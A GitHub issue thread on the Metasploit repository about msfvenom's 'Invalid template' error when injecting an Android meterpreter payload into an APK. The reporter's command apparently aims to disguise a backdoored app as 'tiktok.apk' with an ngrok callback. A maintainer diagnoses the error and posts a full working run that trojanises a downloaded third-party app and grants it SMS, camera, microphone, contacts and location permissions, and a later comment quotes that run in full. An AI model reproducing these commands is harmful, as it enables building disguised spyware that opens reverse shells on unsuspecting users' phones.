### ISSUE TITLE
Error: Invalid template

### ISSUE THREAD

**Issue by GhostInThe5hell** [rapid7/metasploit-framework#18268]
this is a very old issue, ive been looking for an answer for too long, ive NEVER seen anyone being able to help to fix the issue not even people from the metasploit team.

```
 msfvenom --platform android --arch dalvik -x tiklike.apk -k -p android/meterpreter/reverse_tcp lhost=(xxxxx) lport=(xxxxx) --encrypt AES --encrypt-key 12345678901234561234567890123456 R> tiktok.apk
[*] exec: msfvenom --platform android --arch dalvik -x tiklike.apk -k -p android/meterpreter/reverse_tcp lhost=2.tcp.ngrok.io lport=11973 --encrypt AES --encrypt-key 12345678901234561234567890123456 R> tiktok.apk

Overriding user environment variable 'OPENSSL_CONF' to enable legacy functions.
Using APK template: tiklike.apk
[-] Usage: /usr/bin/msfvenom -x [target.apk] [msfvenom options]
[-] e.g. /usr/bin/msfvenom -x messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443
Error: Invalid template: tiklike.apk
```

why im not able to use a template? i just want to read something by myself but everytime i look on the internet theres always the same old questions with no answers

**Comment by bcoles** [comment]
> this is a very old issue

No it isn't. No issue has ever been demonstrated (beyond user error).


> why im not able to use a template? 

The `tiklike.apk` file does not exist, is empty, or not readable.


> everytime i look on the internet theres always the same old questions with no answers
> ive NEVER seen anyone being able to help to fix the issue not even people from the metasploit team.

There are answers. For example, in both these issues the user typed the incorrect file name:

* https://github.com/rapid7/metasploit-framework/issues/8210
* https://github.com/rapid7/metasploit-framework/issues/12803

The phrase `Invalid template` occurs exactly once in Framework:

```
# grep -rn "Invalid template" .
./lib/msf/core/payload/apk.rb:223:      raise RuntimeError, "Invalid template: #{apkfile}"
```

https://github.com/rapid7/metasploit-framework/blob/9e7960fd9ffe5cc2866e047aa75193d9858603e8/lib/msf/core/payload/apk.rb#L221-L224

The error is raised if the APK file does not exist, is empty, or cannot be read.

Does the `tiklike.apk` APK file exist? Is the `tiklike.apk` APK file empty? Is the `tiklike.apk` APK file readable?

**Comment by bcoles** [comment]
For what it is worth, `msfvenom` worked fine with the `tiklike` APK file from here: https://www.apkmonk.com/download-app/com.tiklike.app/5_com.tiklike.app_2023-05-02.apk/

```
[2023-08-06 02:51:30] root@kali:~/Desktop/metasploit-framework# wget 'https://apk.apkmonk.com/apks-2/com.tiklike.app_2023-05-02.apk?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=[redacted]' --user-agent "Mozilla/5.0"
The destination name is too long (297), reducing to 236
--2023-08-06 02:51:37--  https://apk.apkmonk.com/apks-2/com.tiklike.app_2023-05-02.apk?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=[redacted]
Resolving apk.apkmonk.com (apk.apkmonk.com)... 104.22.54.249, 172.67.23.158, 104.22.55.249, ...
Connecting to apk.apkmonk.com (apk.apkmonk.com)|104.22.54.249|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16898089 (16M) [application/vnd.android.package-archive]
Saving to: ‘com.tiklike.app_2023-05-02.apk?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=[redacted]’

com.tiklike.app_2023-05-02.apk?X-Amz-Alg 100%[=================================================================================>]  16.12M  4.54MB/s    in 3.5s    

2023-08-06 02:51:41 (4.54 MB/s) - ‘com.tiklike.app_2023-05-02.apk?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=[redacted]’ saved [16898089/16898089]

[2023-08-06 02:51:45] root@kali:~/Desktop/metasploit-framework# mv com.tiklike.app_2023-05-02.apk\?X-Amz-Algorithm\=AWS4-HMAC-SHA256\&X-Amz-Credential\=[redacted] com.tiklike.app_2023-05-02.apk
[2023-08-06 02:51:48] root@kali:~/Desktop/metasploit-framework# file com.tiklike.app_2023-05-02.apk 
com.tiklike.app_2023-05-02.apk: Android package (APK), with AndroidManifest.xml
[2023-08-06 02:51:50] root@kali:~/Desktop/metasploit-framework# ./msfvenom --platform android --arch dalvik -x com.tiklike.app_2023-05-02.apk -k -p android/meterpreter/reverse_tcp lhost=192.168.200.130 lport=1337 --encrypt AES --encrypt-key 12345678901234561234567890123456 R> tiktok.apk
Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
/usr/lib/x86_64-linux-gnu/ruby/3.1.0/stringio.so: warning: already initialized constant StringIO::VERSION
Using APK template: com.tiklike.app_2023-05-02.apk
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.tiklike.app.zzzly
[*] Loading /tmp/d20230806-3084177-lsj3gy/original/smali_classes3/com/tikstar/base/AppBase.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.CAMERA"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20230806-3084177-lsj3gy/output.apk
[-] I: Using Apktool 2.7.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes2 folder into classes2.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes3 folder into classes3.dex...
I: Checking whether resources has changed...
I: Building resources...
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
W: invalid resource directory name: /tmp/d20230806-3084177-lsj3gy/original/res navigation
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_179511200996891286591889278826177413659.tmp, p, --forced-package-id, 127, --min-sdk-version, 21, --target-sdk-version, 33, --version-code, 35, --version-name, 1.3.6, --no-version-vectors, -F, /tmp/APKTOOL6654072609322946304.tmp, -e, /tmp/APKTOOL16219604349470070271.tmp, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/d20230806-3084177-lsj3gy/original/res, -M, /tmp/d20230806-3084177-lsj3gy/original/AndroidManifest.xml]
[*] Unable to rebuild apk. Trying rebuild with AAPT2..
[*] Aligning /tmp/d20230806-3084177-lsj3gy/output.apk
[*] Signing /tmp/d20230806-3084177-lsj3gy/aligned.apk with apksigner
Payload size: 17203794 bytes
[2023-08-06 03:00:45] root@kali:~/Desktop/metasploit-framework# file tiktok.apk 
tiktok.apk: Android package (APK), with AndroidManifest.xml
```

**Comment by lightkin1313** [comment]
> For what it is worth, `msfvenom` worked fine with the `tiklike` APK file from here: https://www.apkmonk.com/download-app/com.tiklike.app/5_com.tiklike.app_2023-05-02.apk/
> 
> ```
> [2023-08-06 02:51:30] root@kali:~/Desktop/metasploit-framework# wget 'https://apk.apkmonk.com/apks-2/com.tiklike.app_2023-05-02.apk?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=[redacted]' --user-agent "Mozilla/5.0"
> The destination name is too long (297), reducing to 236
> --2023-08-06 02:51:37--  https://apk.apkmonk.com/apks-2/com.tiklike.app_2023-05-02.apk?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=[redacted]
> Resolving apk.apkmonk.com (apk.apkmonk.com)... 104.22.54.249, 172.67.23.158, 104.22.55.249, ...
> Connecting to apk.apkmonk.com (apk.apkmonk.com)|104.22.54.249|:443... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 16898089 (16M) [application/vnd.android.package-archive]
> Saving to: ‘com.tiklike.app_2023-05-02.apk?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=[redacted]’
> 
> com.tiklike.app_2023-05-02.apk?X-Amz-Alg 100%[=================================================================================>]  16.12M  4.54MB/s    in 3.5s    
> 
> 2023-08-06 02:51:41 (4.54 MB/s) - ‘com.tiklike.app_2023-05-02.apk?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=[redacted]’ saved [16898089/16898089]
> 
> [2023-08-06 02:51:45] root@kali:~/Desktop/metasploit-framework# mv com.tiklike.app_2023-05-02.apk\?X-Amz-Algorithm\=AWS4-HMAC-SHA256\&X-Amz-Credential\=[redacted] com.tiklike.app_2023-05-02.apk
> [2023-08-06 02:51:48] root@kali:~/Desktop/metasploit-framework# file com.tiklike.app_2023-05-02.apk 
> com.tiklike.app_2023-05-02.apk: Android package (APK), with AndroidManifest.xml
> [2023-08-06 02:51:50] root@kali:~/Desktop/metasploit-framework# ./msfvenom --platform android --arch dalvik -x com.tiklike.app_2023-05-02.apk -k -p android/meterpreter/reverse_tcp lhost=192.168.200.130 lport=1337 --encrypt AES --encrypt-key 12345678901234561234567890123456 R> tiktok.apk
> Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
> /usr/lib/x86_64-linux-gnu/ruby/3.1.0/stringio.so: warning: already initialized constant StringIO::VERSION
> Using APK template: com.tiklike.app_2023-05-02.apk
> [*] Creating signing key and keystore..
> [*] Decompiling original APK..
> [*] Decompiling payload APK..
> [*] Locating hook point..
> [*] Adding payload as package com.tiklike.app.zzzly
> [*] Loading /tmp/d20230806-3084177-lsj3gy/original/smali_classes3/com/tikstar/base/AppBase.smali and injecting payload..
> [*] Poisoning the manifest with meterpreter permissions..
> [*] Adding <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
> [*] Adding <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
> [*] Adding <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
> [*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
> [*] Adding <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
> [*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
> [*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
> [*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
> [*] Adding <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
> [*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
> [*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
> [*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
> [*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
> [*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
> [*] Adding <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
> [*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
> [*] Adding <uses-permission android:name="android.permission.CAMERA"/>
> [*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
> [*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
> [*] Rebuilding apk with meterpreter injection as /tmp/d20230806-3084177-lsj3gy/output.apk
> [-] I: Using Apktool 2.7.0
> I: Checking whether sources has changed...
> I: Smaling smali folder into classes.dex...
> I: Checking whether sources has changed...
> I: Smaling smali_classes2 folder into classes2.dex...
> I: Checking whether sources has changed...
> I: Smaling smali_classes3 folder into classes3.dex...
> I: Checking whether resources has changed...
> I: Building resources...
> Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
> W: invalid resource directory name: /tmp/d20230806-3084177-lsj3gy/original/res navigation
> brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_179511200996891286591889278826177413659.tmp, p, --forced-package-id, 127, --min-sdk-version, 21, --target-sdk-version, 33, --version-code, 35, --version-name, 1.3.6, --no-version-vectors, -F, /tmp/APKTOOL6654072609322946304.tmp, -e, /tmp/APKTOOL16219604349470070271.tmp, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/d20230806-3084177-lsj3gy/original/res, -M, /tmp/d20230806-3084177-lsj3gy/original/AndroidManifest.xml]
> [*] Unable to rebuild apk. Trying rebuild with AAPT2..
> [*] Aligning /tmp/d20230806-3084177-lsj3gy/output.apk
> [*] Signing /tmp/d20230806-3084177-lsj3gy/aligned.apk with apksigner
> Payload size: 17203794 bytes
> [2023-08-06 03:00:45] root@kali:~/Desktop/metasploit-framework# file tiktok.apk 
> tiktok.apk: Android package (APK), with AndroidManifest.xml
> ```

In my testing, although the APK did rebuild fine using AAPT2, it however lost its additional permissions. @bcoles can you validate if this is commonly the case using msfvenom?  Seems like an easy to reproduce item and so far for me whenever AAPT2 is being used the permissions get dropped.

**Comment by Ali-Alhussein99** [comment]
Error: Invalid template: slither.io_2.41_APKPure.apk

Please help me solve this problem
